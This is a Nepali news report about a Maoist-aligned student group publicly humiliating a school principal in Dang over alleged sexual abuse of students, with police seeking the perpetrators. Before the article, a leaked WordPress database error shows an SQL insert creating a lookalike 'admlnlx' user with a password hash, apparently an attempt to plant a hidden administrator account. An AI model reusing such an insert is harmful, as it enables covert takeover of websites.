WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuCTlooxA50mfML97O6MJnO.f4djHF/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 21:17:38', '', 'admlnlx', 'admlnlx')
तुलसीपुर,माघ २७-
पश्चिम दाङको धनौरीस्थित मिड वेस्टर्न प्वाइन्ट एकेडेमीका प्रिन्सिपल वीरबहादुर घर्तीलाई विप्लप माओवादी निकटको अनेरास्ववियु (क्रान्तिकारी) राप्तीको छात्रा विभागले कालोमोसो दलेको छ ।
प्रिन्सिपल घर्तीले विद्यालयका छात्रालाई पटकपटक यौन दुर्व्यवहार गरेकाले उनलाई जनकारबाहीस्वरूप कालोमोसो दलेर जुत्ताको माला लगाइएको अखिल (क्रान्तिकारी)राप्ती ब्युरो संयोजक नरेन्द्र विकले जानकारी दिए । प्रहरीले भने घर्तीलाई कालोमोसो दल्ने र जुत्ताको माला लगाउनेको खोजी भइरहेको जनाएको छ ।
सो घटनामा प्रयोग गरेको रा३प ६१८५ नम्बरको मोटरसाइकल र रा१ज ५३८ नम्बरको जिप प्रहरीले नियन्त्रणमा लिएको दाङ प्रहरीका निमित्त प्रहरी प्रमुख प्रहरी नायब उपरीक्षक भुवनेश्वर तिवारीले जानकारी दिए । ‘कार्यक्रम छ भन्दै सबैलाई जम्मा गरेर कालोमोसो र जुत्ताको माला लगाएर भागेछन्,’ डीएसपी तिवारीले भने । खबर पनि ढिला आएकाले पक्राउ गर्न नसकिएको उनले बताए । राजधानी दैनिकमा खबर छ । राजधानी दैनिकमा खबर छ ।